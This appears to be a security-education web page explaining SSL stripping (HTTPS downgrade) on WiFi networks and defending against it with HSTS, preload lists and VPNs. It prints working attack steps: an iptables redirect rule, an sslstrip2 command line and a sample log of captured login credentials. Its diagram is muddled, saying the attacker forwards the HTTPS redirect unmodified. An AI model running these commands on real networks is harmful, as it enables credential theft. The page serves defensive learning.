WiFi Attack

SSL Stripping: HTTPS Downgrade Attacks

Technical documentation on SSL Stripping & HTTPS Downgrade. Understand the attack technique and learn how to defend against it.

Medium Threat Intermediate

Updated April 2026

3 min read

Wireshark packet capture showing network traffic analysis with visible HTTP requests and IP addresses

MalwareZero Research Team Updated April 2026

id="what-it-does">What SSL Stripping Actually Does

When you type a URL like bank.com into your browser, most browsers first attempt an HTTP connection on port 80. The server then redirects you to https://bank.com. This redirect happens in plain text — and that plain text is where the attacker lives.

The Normal HTTP → HTTPS Redirect: [Browser] ──── HTTP GET / ────→ [bank.com:80] [Browser] ←─── 302 redirect to https:// ──── [bank.com:80] [Browser] ──── HTTPS GET / ────→ [bank.com:443] [Browser] ←─── encrypted content ──── [bank.com:443] [All good — encrypted from here] The SSL Stripped Attack: [Browser] ──── HTTP GET / ────→ [Attacker MITM] [Attacker] ──── HTTP GET / ────→ [bank.com:80] [bank.com:80] ←─── 302 to https:// ──── [Attacker] [Attacker] ←─── FORWARDS the 302 to browser (unmodified) ──── [But: Attacker also establishes HTTPS to bank.com:443 as the real client] [Attacker acts as a proxy — sees all unencrypted data]

How It Works: sslstrip2

sslstrip2 (by Leonardo Nve, updated by Dante S.) automates this attack. It sits between the victim and the internet, intercepting HTTP traffic and removing the TLS upgrade prompts.

$ # Configure iptables to redirect HTTP traffic to sslstrip

$ sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080



$ # Run sslstrip2

$ python3 -m sslstrip2 -l 8080 -w /var/log/sslstrip.log -p



[+] sslstrip2 0.9.2 by Leonardo Nve ( Leonardo@兜.org )

[+]sslstrip2 listening on port 8080

[+] sslstrip2 proxy active



# Victim connects to http://gmail.com

# sslstrip strips the upgrade-to-HTTPS redirect

# Victim stays on HTTP — their login is now visible



# View captured credentials

$ tail -f /var/log/sslstrip.log



##################################################

#sslstrip2 log - POSTs are marked with ***

##################################################



[...] gmail.com ...

POST /ServiceLogin HTTP/1.1

***username=john%40gmail.com&passwd=MyPass2026%21

Cookie: NID=123=abc...

HSTS: The Defense Against SSL Stripping

HSTS (HTTP Strict Transport Security) is the primary defense against SSL stripping. When a browser receives an HSTS header from a domain, it remembers to ONLY connect via HTTPS for the specified duration — never attempting an HTTP connection first.

Strict-Transport-Security: max-age=31536000; includeSubDomains

This means: even if the victim types http:// or clicks an HTTP link, the browser automatically upgrades to HTTPS before sending any request. The attacker never gets the unencrypted HTTP request to strip.

HSTS Preloading

The HSTS Preload List is a hardcoded list in browsers of domains that must always use HTTPS. Chrome, Firefox, Safari, and Edge all use the preload list. If your domain is in the HSTS preload list, there's no HTTP-first attempt at all — the browser always starts with HTTPS. To submit your domain: hstspreload.org

HSTS Effectiveness

HSTS + preload makes SSL stripping ineffective against major sites. However, many smaller sites and internal corporate applications don't implement HSTS. The attack remains viable against any site that either (1) doesn't use HTTPS at all, or (2) uses HTTPS but hasn't configured HSTS.

Why Most Sites Still Support HTTP

Despite widespread HTTPS adoption, many sites still accept HTTP connections because:

Legacy compatibility: Some users type http:// directly
Redirect costs: Some sites redirect to HTTPS but do so in a way that's strippable
Performance: HTTPS adds TLS handshake overhead (mitigated by TLS 1.3 and 0-RTT)
Cost: Certificates used to cost money (now free via Let's Encrypt)
Corporate proxies: Some corporate networks intercept and modify HTTPS at the proxy level

Defense Against SSL Stripping

HSTS: Enable HSTS on all your web properties with a long max-age. Submit to the HSTS preload list.
HTTPS everywhere: Never accept HTTP connections. Redirect HTTP to HTTPS, but also set HSTS headers.
Certificate monitoring: Services like SSLMate and Certificate Transparency logs alert you when unexpected certificates are issued for your domains.
Browser extensions: HTTPS Everywhere (EFF) forces HTTPS on sites that support it but don't enforce it.
Public WiFi policy: Never use HTTP sites on public WiFi. Only use HTTPS sites (look for the padlock).
VPN: A VPN encrypts all traffic, preventing SSL stripping attacks from working on the underlying connection.

← PreviousDNS Hijacking: WiFi Attack Guide Next →Session Hijacking: WiFi Attacks

Understand the Threat. Build the Defense.

Learn how to protect yourself and your organization against Ssl Stripping attacks.

View Defense Guide All Attacks